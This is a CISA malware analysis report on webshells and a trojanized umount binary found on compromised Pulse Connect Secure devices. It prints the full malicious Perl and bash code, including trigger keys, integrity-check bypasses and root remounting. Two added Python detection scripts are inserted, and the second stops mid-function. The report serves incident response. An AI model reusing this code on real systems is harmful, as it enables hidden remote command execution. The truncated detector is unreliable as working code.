Malware Analysis Report (AR21-236E)

MAR-10339606-1.v1: Pulse Secure Connect


Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received five files for analysis. Two files are Perl scripts that execute the attacker's commands stored in the environment variable; one file is a Perl library that provides functions to an installer; one file is a Perl script that creates a table and that table's first record; and one file is a shell script that manipulates the '/bin/umount' file and executes it. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of indicators of compromise, see: MAR-10339606-1.v1.stix

Files (5)

4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928 (umount)

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767 (DSUpgrade.pm)

ade49335dd276f96fe3ba89de5eb02ea380901b5ef60ff6311235b6318c57f66 (licenseserverproto.cgi)

e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1 (rdpreauth.cgi)

ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17 (licenseserverproto.cgi)

Findings

ade49335dd276f96fe3ba89de5eb02ea380901b5ef60ff6311235b6318c57f66

Tags

webshell

Details
Name licenseserverproto.cgi
Size 3386 bytes
Type Perl script text executable
MD5 ed914f64e3dcc179b51d9a182eefc3cd
SHA1 51c6fb115683fd29cf905a9248c7ed57c0468cec
SHA256 ade49335dd276f96fe3ba89de5eb02ea380901b5ef60ff6311235b6318c57f66
SHA512 af1e62a0bd37b639418e3f6c1d7186e3b2dfadb8e9ba8f19a6646d190757f331b43738adcd945c9d14a7c2215a6f8f68f9c6fe7ea4033c10bafc9b2d6f27c19e
ssdeep 48:Ei3LYmeAJAZo6HMeQT808inRbxUQjQk0BeWo7BuswT4o7oo7vpBBBQWBZ7zSH72d:Ei7YkJAZnqpxUxHo0v/wO27YJ
Entropy 5.336890
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This is a Perl script that executes a command supplied via an HTTP GET request and read from the environment variable $ENV{'QUERY_STRING'}.
If the current request's "serverid" parameter matches a hard-coded value, the script fetches the attacker's command from $ENV{'QUERY_STRING'} and executes it.

This Perl script also creates a table with two columns (msg_body, msg_length) and the first record for that table. The first record's msg_body is the standard input stream and its msg_length is the length of that stream.

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767

Tags

webshell

Details
Name DSUpgrade.pm
Size 9791 bytes
Type Perl5 module source, ASCII text
MD5 4d5b410e1756072a701dfd3722951907
SHA1 cc68a9c5ff57129e8b897d228e54807841f8ff67
SHA256 6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767
SHA512 965b13b1a11c2b2472de1f491bb3fde1d96288fa204428b135281ae7928a5bafea5c244fdd1f47a96242861c94a4fa8d5f6664f543dec33cfc519faca044766d
ssdeep 192:eIB1XcTfXss+nBqXb+TSWbgXCiwWjoBTWFI4MhiirXHLwQBNaBiF3Ar8yXpayUM6:eIB1X1phiJ/irZNaBiF3CjCswmPyVoM
Entropy 5.235000
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application that has been modified to add webshell script code into the content of the Pulse Secure Perl CGI script file "/root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi."

The script contains the following patched-in, commented-out code:

--Begin Patched In Commented CGI Code--
###scriptstart
#/bin/mount -o remount,rw /dev/root /
#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#start_total/,/\#\#end_total/w 7CxA1p' outer-do-install
#/bin/sed -i '/DSINSTALL_CLEAN/r 7CxA1p' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w GqTv3w' outer-do-install
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w Vi6d8h4' outer-do-install
#/bin/sed -i '/^use DSUtilTable/r GqTv3w' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/^sub main/r Vi6d8h4' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/#//' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/^/#/' ./root/home/perl/DSUpgrade.pm
#/usr/bin/gzip -d $innerarchive
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm
#/bin/rm -f 7CxA1p
#/bin/rm -f GqTv3w
#/bin/rm -f Vi6d8h4
#/bin/rm -fr root
#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive
###scriptend

###cgistart1
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split('&', $input)) {
#    my ($var, $value) = split('=', $pair, 2);
#    
#    if($var) {
#     $value =~ s/\+/ /g ;
#     $value =~ s/%(..)/pack('c',hex($1))/eg;
#
#     $ret{$var} = $value;
#    }
# }
#
# return %ret;
#}
###cgiend1

###cgistart2
#    my $enckey='1234567';
#    my $data='1234567812345678';
#        my $cipher = RC4($enckey, $data);    
#        my $encode = MIME::Base64::encode($cipher);
#    my $psalLaunch = CGI::param("serverid");
#    if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
#    {
#    my ($cmd, %FORM);
#
#    $|=1;
#
#    print "Content-Type: text/html\r\n";
#    print "\r\n";
#    %FORM = parse_parameters($ENV{'QUERY_STRING'});
#
#    if(defined $FORM{'cmd'}) {
#     $cmd = $FORM{'cmd'};
#    }
#
#print '<HTML>
#<body>
#<form action="" method="GET">
#<input type="text" name="cmd" size=45 value="' . $cmd . '">
#<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">
#<input type="submit" value="Run">
#</form>
#<pre>';
#
#if(defined $FORM{'cmd'}) {
# print "Results of '$cmd' execution:\n\n";
# print "-"x80;
# print "\n";
#
# print $encode;
# system $cmd;
# print "-"x80;
# print "\n";
#}
# print "</pre>";
# exit(0);
#    }
###cgiend2

##end_total
--End Patched In Commented CGI Code--

The Pulse Secure Perl module also contains the following suspicious live (uncommented) code. This code modifies several Pulse Secure system files using sed and attempts to install code from an archive named new-pack.tgz, which is expected to already be present on the target system.

--Begin Patched In Live (Uncommented) Code--
sub installPackage {
my ($clean, $console, $html) = @_;

$ENV{"DSINSTALL_CLEAN"} = $clean;

##start_total
##perlstart
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");
my $statushh = $? % 255;
if( $statushh != 0 )
{
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w K872Bu' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/usr/bin/gzip -d /tmp/new-pack.tgz");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");
       system("/bin/rm -f K872Bu");
       system("/bin/rm -f Mj1Za");
       system("/bin/rm -f 1uMfVB");
       system("/bin/rm -fr root");
       system("rm -f /tmp/new-pack.tgz");
       system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
}
else{
system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/^/#/' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/#//' ./installer/outer-do-install");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");
system("rm -f Nc3Gy.pm");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
system("rm -fr installer");
}
--End Patched In Live (Uncommented) Code--

Analysis indicates this commented code is designed to present a web form to a remote operator, wherein the remote operator can enter commands that will be run locally on the target system. The commented code also has the capability to modify several Pulse Secure system files utilizing the SED command.
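The GET webshell above is driven entirely by query-string parameters (serverid as the trigger, cmd as the command), so its use leaves evidence in web server access logs. The following detection pass is an added example, not code from this report; it assumes combined-format access log lines (Pulse Connect Secure's own log format may differ, so LOG_RE would need adapting) and the log entries in it are constructed samples:

```python
"""Detect use of the GET-based licenseserverproto.cgi webshell in web access
logs (added example, not CISA's code). It parses combined-format log lines,
which is an assumption: Pulse Connect Secure's own log format may differ, so
adapt LOG_RE to your source. Log lines below are constructed samples."""
import re
from urllib.parse import parse_qs, urlsplit

# The trigger value the patched-in code compares "serverid" against, and the
# CGI the webshell code is spliced into.
SERVERID_MARKER = "csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa"
TARGET_PATH = "/dana-na/licenseserver/licenseserverproto.cgi"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

def classify(line):
    """Return a finding dict for a webshell request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    if url.path != TARGET_PATH:
        return None
    # parse_qs undoes the '+' and %XX encoding that the webshell's own
    # parse_parameters() routine reverses on the server side.
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    # serverid is a legitimate parameter of this CGI, so only the exact
    # hard-coded trigger value is treated as an indicator.
    if SERVERID_MARKER in params.get("serverid", []):
        reasons.append("serverid equals the webshell trigger value")
    if "cmd" in params:
        reasons.append("cmd parameter present: %r" % params["cmd"][0])
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "reasons": reasons}

def scan(lines):
    """Classify every line; returns only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed access-log lines (RFC 5737 test addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jul/2021:10:54:42 +0000] "GET /dana-na/licenseserver/licenseserverproto.cgi?serverid=lic01 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Jul/2021:10:55:01 +0000] "GET /dana-na/licenseserver/licenseserverproto.cgi?cmd=id&serverid=csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa HTTP/1.1" 200 1044 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Jul/2021:10:55:07 +0000] "GET /dana-na/auth/welcome.cgi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""
```

The POST variant described later in this report carries its key and command in request headers and an RC4/Base64-encoded body, so it leaves no query-string evidence of this kind and has to be found by inspecting the CGI files on the device instead.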

e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1

Tags

webshell

Details
Name rdpreauth.cgi
Size 1894 bytes
Type Perl script text executable
MD5 e7e2f79ade6f198c5d9707b6f94a9a41
SHA1 0a4a5be7704fa9f1a8c826888060831051767b52
SHA256 e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1
SHA512 af5ba0cd5dcc6f2761bce3950c8aa918df9611796da53657790d34d8ea014d6ece27a8fa302ebed9fd235dff2b3ce864ff0c462c3fa0997b65b666107eb3c204
ssdeep 48:E8LYaef1MCZDh7YQkg/3YElOI1P9Y611Zze4+kBkqFogb4mX/yZTOj:EaYH5Z17Yc/3Y6z/3e2CqFHbXvv
Entropy 5.032639
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure system application that has been modified to allow an operator to remotely execute commands on a compromised Pulse Secure device. Its main() function (see the screenshot below) has been hooked with a webshell. This webshell is similar in design and functionality to the webshell described under the file sdp_mobile_login.cgi. The primary difference is that the static value BM6OAa1XCpH4x4ISEnJYZXmyHhJG8JxC must be passed in HTTP_X_KEY for the webshell to process and execute the provided command.

Screenshots

Screen_Shot_2021-07-30_at_10.54.42.png (screenshot of the hooked main() function in rdpreauth.cgi; image not included in this text version)

4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928

Details
Name umount
Size 53836 bytes
Type data
MD5 53a3bce53a360a8614337ac52672cd20
SHA1 4991f7ffbb16128fafc1c6d476a5793f4dc2554a
SHA256 4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928
SHA512 6ed95c5d452ee26bcc8b945aafb17807d1db2d6b3b46958435a02619c6cddf1b5a017a36d4e022c6e9ae57d588d29f1eac95c25496834cab86564c1f288491fe
ssdeep 768:EAkWEZfTRlHCc6DZ7z1K1q0C+i6d81CEdObeDE+sJeRbtkzuBe5Ri3XJCEJ:QWQtXkZ9K00C+iQVeQeRxOAkEJ
Entropy 6.131720
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a malicious replacement for the Unix umount binary. The modified umount consists of a bash script with the original ELF binary appended. When the system attempts to perform an unmount, the "main" portion of this script performs several modifications to the Pulse Secure device before extracting the appended ELF binary, writing it to disk, marking it executable, and using it to actually perform the umount task. The application thus acts as a "hook" on the compromised device's unmount operation. The system modifications performed by this hook are designed to give a remote operator command and control capability over the compromised Pulse Secure device.

The full malicious script contained within this application is illustrated below. After this full illustration is a summary explanation of the primary pieces of this full malicious script.

--Begin Full Malicious Script--

##sstart
#!/bin/bash
normal_um()
{
   /bin/cp /bin/umount /bin/umount_re
   /bin/sed -i '/\#\#sstart/,/\#\#eend/d' /bin/umount_re
   /bin/sed -i '1d' /bin/umount_re
   /bin/sed -i 's/^#//' /bin/umount_re
   /bin/chmod u+x /bin/umount_re
   /bin/umount_re $*
   /bin/rm -f /bin/umount_re
   /bin/mount -o remount,ro /dev/root / >/dev/null 2>&1
}

patch_manifest()
{
   file="/tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi"
   OPENSSL="/tmp/data/root/home/bin/openssl"
   h=`$OPENSSL dgst -sha256 $file 2>/dev/null | sed -e 's/^[^ ]*= //'`
   bkh="/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi "$h" b"
   ori=`sed -n "/sdp_mobile_login.cgi/=" /tmp/data/root/home/etc/manifest/manifest`
   if [ -n "$ori" ]; then
    /bin/sed -i "$ori"a\\"$bkh" /tmp/data/root/home/etc/manifest/manifest
    /bin/sed -i "$ori"d /tmp/data/root/home/etc/manifest/manifest
   fi

   sed -i '/verify 1/d' /tmp/data/root/home/bin/check_integrity.sh
   sed -i '/err Signature/d' /tmp/data/root/home/bin/check_integrity.sh
}


patch_cgi()
{
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w tmp1' /bin/umount
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w tmp2' /bin/umount
   /bin/sed -i '/^use DSSessionParams/r tmp1' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/^sub main/r tmp2' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgi/d' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/rm -f tmp1
   /bin/rm -f tmp2
}

patch_libdsp()
{
   /bin/sed -i 's/ForceCommand/#orceCommand/g' /tmp/data/root/home/lib/libdsplibs.so
   /bin/sed -i '/local line c file sha m/,/exit 1/s/verifyFiles//g' /tmp/data/root/home/bin/check_integrity.sh
}

patch_umount()
{
   /bin/sed -i '/\#\#sstart/,/\#\#eend/w /tmp/data/root/bin/xx' /bin/umount
   /bin/sed -i 's/^/#/' /tmp/data/root/bin/umount
   /bin/sed -i '1i \ ' /tmp/data/root/bin/umount
   /bin/sed -i '1r /tmp/data/root/bin/xx' /tmp/data/root/bin/umount
   /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp
   /bin/rm -f /tmp/data/root/bin/xx
}




waitweb()
{
   trap '' HUP >/dev/null 2>&1
   st=1
   while [ $st -lt 2 ] ; do
       ps -fA|grep /home/bin/web |grep -v grep > /dev/null
       if [ $? -eq 0 ]; then
           sleep 3
           /bin/mount -o remount,rw /dev/root / >/dev/null 2>&1
           st=2
           /bin/mount -o remount,ro /dev/root / > /dev/null 2>&1
       else
           sleep 2
       fi
   done
}

/bin/mount -o remount,rw /dev/root / >/dev/null 2>&1
if [ $# == 2 ] && [ $1 == "-r" ] && [ $2 == "/tmp/data/root" ] ; then
   patch_cgi
   patch_manifest
   patch_umount
   patch_libdsp
   normal_um $*
else
   normal_um $*
fi

###cgistart1
#use Crypt::RC4;
#use MIME::Base64 ();
###cgiend1

###cgistart2
#my $request_method=$ENV{'REQUEST_METHOD'};
#if ($request_method eq "POST") {
#    my $x_key = $ENV{'HTTP_X_KEY'};
#    if ($x_key eq "zzdibweoQxffnDEi2UKacJlEekplJ7uwrt") {
#        my $x_cmd = $ENV{'HTTP_X_CMD'};
#        my $x_cnt = $ENV{'HTTP_X_CNT'};
#        $x_cmd = MIME::Base64::decode($x_cmd);
#        $x_cmd = RC4($x_cnt, $x_cmd);
#        my $res;
#        my $re=popen(*DUMP, $x_cmd, "r");
#        while(<DUMP>){
#            $res .= $_;
#        }
#        close(*DUMP);
#        print "Content-type:text/html\n\n";
#        print MIME::Base64::encode(RC4($x_cnt, $res));
#        exit(0);
#    }
#    else {
#        exit(0);
#    }
#}
###cgiend2

##eend

--End Full Malicious Script--

The function illustrated below is designed to make a small modification to the Pulse Secure system file named libdsplibs.so. This function will change all occurrences of the string "ForceCommand" in the libdsplibs.so binary to the string "#orceCommand". The function below will also remove the string "verifyFiles" from the Pulse Secure system file named check_integrity.sh.

--Begin libdsplibs.so Modification Function--

patch_libdsp()
{
   /bin/sed -i 's/ForceCommand/#orceCommand/g' /tmp/data/root/home/lib/libdsplibs.so
   /bin/sed -i '/local line c file sha m/,/exit 1/s/verifyFiles//g' /tmp/data/root/home/bin/check_integrity.sh
}

--End libdsplibs.so Modification Function--

The function illustrated below is designed to modify the Pulse Secure system files named manifest and check_integrity.sh. As illustrated, this function hashes the new version of the script named sdp_mobile_login.cgi, which now contains a patched in webshell. The function then counts the number of times the string "sdp_mobile_login.cgi" is found in the Pulse Secure manifest file. The malware then replaces this "sdp_mobile_login.cgi" string with the full path of the patched version, and its corresponding SHA256 value within the manifest file. The replacement string for the current "sdp_mobile_login.cgi" strings will appear similar to the following: "/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi 6092a24ca3853fb351989ee1aa2eca604fc438afc1e64df3ede10ffda577d475 b".

The function then removes the strings "verify 1" and "err Signature" from the Pulse Secure system file check_integrity.sh. The purpose of these modifications is not conclusively known; however, it appears they may be required for the Pulse Secure system to allow execution of the hacker-modified version of sdp_mobile_login.cgi.

Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.

--Begin manifest and check_integrity.sh Modification Function--

patch_manifest()
{
   file="/tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi" //*CISA: Assign full path to variable file
   OPENSSL="/tmp/data/root/home/bin/openssl"
   h=`$OPENSSL dgst -sha256 $file 2>/dev/null | sed -e 's/^[^ ]*= //'` //*CISA: SHA256 hash file.
   bkh="/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi "$h" b"         //*CISA: Build variable containing full file name and SHA256.
   ori=`sed -n "/sdp_mobile_login.cgi/=" /tmp/data/root/home/etc/manifest/manifest` //*CISA: Count number of sdp_mobile_login.cgi occurrences.
   if [ -n "$ori" ]; then                
    /bin/sed -i "$ori"a\\"$bkh" /tmp/data/root/home/etc/manifest/manifest //*CISA: Replace with full path of hacked sdp_mobile_login.cgi file with hash value.
    /bin/sed -i "$ori"d /tmp/data/root/home/etc/manifest/manifest
   fi
   sed -i '/verify 1/d' /tmp/data/root/home/bin/check_integrity.sh //*CISA: Remove "verify 1" string from file.
   sed -i '/err Signature/d' /tmp/data/root/home/bin/check_integrity.sh //*CISA: Remove "err Signature" string from file.
}

--End manifest and check_integrity.sh Modification Function--

The script modifies the Pulse Secure system file named sdp_mobile_login.cgi by adding data to it from a file contained on disk named tmp2. The code used to modify sdp_mobile_login.cgi is illustrated below. Analysis of the modified sdp_mobile_login.cgi indicates this modification adds a webshell to the Pulse Secure application, which allows an operator to remotely issue commands to a compromised device. This patched-in webshell is detailed within the description of the file sdp_mobile_login.cgi, included within this document. Notably, the function below also modifies the /bin/umount application by adding data to it contained in the files tmp1 and tmp2. After the modifications of umount and sdp_mobile_login.cgi, the function deletes the files tmp1 and tmp2. The original files tmp1 and tmp2 were not available for analysis.

--Begin sdp_mobile_login.cgi and umount Modification Code (Using tmp1 and tmp2)--

patch_cgi()
{
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w tmp1' /bin/umount
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w tmp2' /bin/umount
   /bin/sed -i '/^use DSSessionParams/r tmp1' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/^sub main/r tmp2' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgi/d' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/rm -f tmp1
   /bin/rm -f tmp2
}

--End sdp_mobile_login.cgi and umount Modification Code (Using tmp1 and tmp2)--

The malicious function illustrated below is designed to extract the ELF binary from the current (hacker modified) umount application, and run it as a standalone application to actually perform the umount function for the operating system. The function extracts the embedded ELF, writes it out to disk as /bin/umount_re, and sets it to executable via the system command /bin/chmod u+x /bin/umount_re. The function then executes the umount_re application and deletes it from disk. The final command in the function mounts /dev/root as read only. The remounting of /dev/root with read only permissions is likely a method to hide this activity from a system administrator, as it may draw the attention of system analysts that /dev/root is mounted with read and write permissions.

--Begin normal_um() Function--

normal_um()
{
   /bin/cp /bin/umount /bin/umount_re
   /bin/sed -i '/\#\#sstart/,/\#\#eend/d' /bin/umount_re
   /bin/sed -i '1d' /bin/umount_re
   /bin/sed -i 's/^#//' /bin/umount_re
   /bin/chmod u+x /bin/umount_re
   /bin/umount_re $*
   /bin/rm -f /bin/umount_re
   /bin/mount -o remount,ro /dev/root / >/dev/null 2>&1
}

--End normal_um() Function--

The function below modifies the system application /bin/umount using the data contained in a file named /tmp/data/root/bin/xx. The function then deletes the file named /tmp/data/root/bin/xx.

--Begin patch_umount Function--

patch_umount()
{
   /bin/sed -i '/\#\#sstart/,/\#\#eend/w /tmp/data/root/bin/xx' /bin/umount
   /bin/sed -i 's/^/#/' /tmp/data/root/bin/umount
   /bin/sed -i '1i \ ' /tmp/data/root/bin/umount
   /bin/sed -i '1r /tmp/data/root/bin/xx' /tmp/data/root/bin/umount
   /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp
   /bin/rm -f /tmp/data/root/bin/xx
}

--End patch_umount Function--

Illustrated below is the "main" portion of this malicious script, with comments added by CISA to illustrate the purpose of each step.

Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.

--Begin Main Script--

/bin/mount -o remount,rw /dev/root / >/dev/null 2>&1 //*CISA: Mount the /dev/root partition with read and write permissions.
if [ $# == 2 ] && [ $1 == "-r" ] && [ $2 == "/tmp/data/root" ] ; then
   patch_cgi //*CISA: Patch the applications /bin/umount and sdp_mobile_login.cgi with malicious code (allowing remote access to device).
   patch_manifest //*CISA: Patch manifest and check_integrity.sh scripts so they will not block the now patched app sdp_mobile_login.cgi.
   patch_umount //*CISA: Patches the /bin/umount file with data from /tmp/data/root/bin/xx.
   patch_libdsp //*CISA: Patches Pulse Secure system library /tmp/data/root/home/lib/libdsplibs.so.
   normal_um $* //*CISA: Extracts ELF from patched umount application, executes it, deletes it. Then remounts /dev/root as read only.
else
   normal_um $*
fi

--End Main Script--
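The umount wrapper above leaves a consistent set of host artifacts: a script header where ELF magic belongs, the ##sstart/##cgistart splice markers, "#orceCommand" in libdsplibs.so, deleted verification lines in check_integrity.sh, and a manifest entry rewritten to match the modified CGI. The host triage script below is an added example, not CISA's code; the file paths it checks and the sample contents it runs against are constructed stand-ins for files copied off a device:

```python
"""Host triage for the tampering this report describes (added example, not
CISA's code). Checks file contents for the artifacts the umount wrapper leaves:
a script header where ELF magic belongs, splice markers, '#orceCommand' in
libdsplibs.so, deleted verification lines, webshell trigger values and a
manifest entry rewritten to match the modified CGI. Samples are constructed."""
import hashlib
import re

ELF_MAGIC = b"\x7fELF"
# Delimiters the wrapper script uses to carve out the code it splices in.
SPLICE_MARKERS = (b"##sstart", b"##eend", b"##cgistart1", b"##cgiend1",
                  b"##cgistart2", b"##cgiend2", b"##scriptstart", b"##perlstart")
# Static trigger values the report's webshells compare against.
WEBSHELL_KEYS = (b"csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa",
                 b"zzdibweoQxffnDEi2UKacJlEekplJ7uwrt",
                 b"BM6OAa1XCpH4x4ISEnJYZXmyHhJG8JxC")

def check_umount(content):
    """A genuine umount is an ELF executable; the trojanized one is a bash
    script followed by the real binary with every line prefixed by '#'."""
    findings = []
    if not content.startswith(ELF_MAGIC):
        findings.append("umount does not start with ELF magic")
    if content.lstrip().startswith(b"##sstart") or b"#!/bin/bash" in content[:64]:
        findings.append("umount begins with a shell script header")
    findings += ["splice marker %s present" % m.decode() for m in SPLICE_MARKERS if m in content]
    return findings

def check_libdsp(content):
    # patch_libdsp rewrites every "ForceCommand" in libdsplibs.so to "#orceCommand".
    return ["libdsplibs.so contains '#orceCommand'"] if b"#orceCommand" in content else []

def check_integrity_script(content):
    # patch_manifest deletes the 'verify 1' and 'err Signature' lines and
    # patch_libdsp strips 'verifyFiles'; a copy lacking them has been edited.
    return ["check_integrity.sh is missing '%s'" % n.decode()
            for n in (b"verify 1", b"err Signature", b"verifyFiles") if n not in content]

def check_cgi(content):
    findings = ["webshell trigger value %s present" % k.decode()
                for k in WEBSHELL_KEYS if k in content]
    # The GET variant runs `system $cmd`; the POST variant reads HTTP_X_CMD.
    if re.search(rb"system\s+\$cmd\b", content) or b"HTTP_X_CMD" in content:
        findings.append("CGI passes request-controlled data to a shell command")
    return findings

def check_manifest(manifest, files):
    """Manifest lines look like '<path> <sha256> b'. A matching hash on a file
    that also trips check_cgi means the manifest was rewritten to bless the
    modified file, which is exactly what patch_manifest does."""
    findings = []
    for line in manifest.decode(errors="replace").splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] not in files:
            continue
        path, digest = parts[0], parts[1]
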